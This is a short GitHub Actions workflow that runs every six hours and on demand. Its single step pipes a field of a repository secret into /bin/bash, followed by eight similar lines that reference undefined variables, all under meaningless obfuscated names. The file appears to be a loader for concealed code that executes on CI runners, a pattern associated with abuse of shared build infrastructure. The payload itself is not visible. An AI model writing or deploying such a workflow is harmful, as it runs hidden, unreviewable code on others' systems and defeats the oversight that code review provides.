name: lianglingxiao5432

on:
  workflow_dispatch:
  schedule:
    - cron: '50 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lianglingxiao5432
        env:
          mx4: ${{ secrets.mx4 }}
        run: |
          echo $mx4 | jq -r .revh43370 | /bin/bash
          echo $uzck79 | jq -r .qp35829 | /bin/bash
          echo $wk73334 | jq -r .fnzei19 | /bin/bash
          echo $flxr478 | jq -r .yiysp220 | /bin/bash
          echo $pkbu37384 | jq -r .c2216 | /bin/bash
          echo $cfiii10 | jq -r .amxz8354 | /bin/bash
          echo $qto0 | jq -r .faca09 | /bin/bash
          echo $siky7759 | jq -r .fiat38 | /bin/bash
          echo $apd02923 | jq -r .t5 | /bin/bash

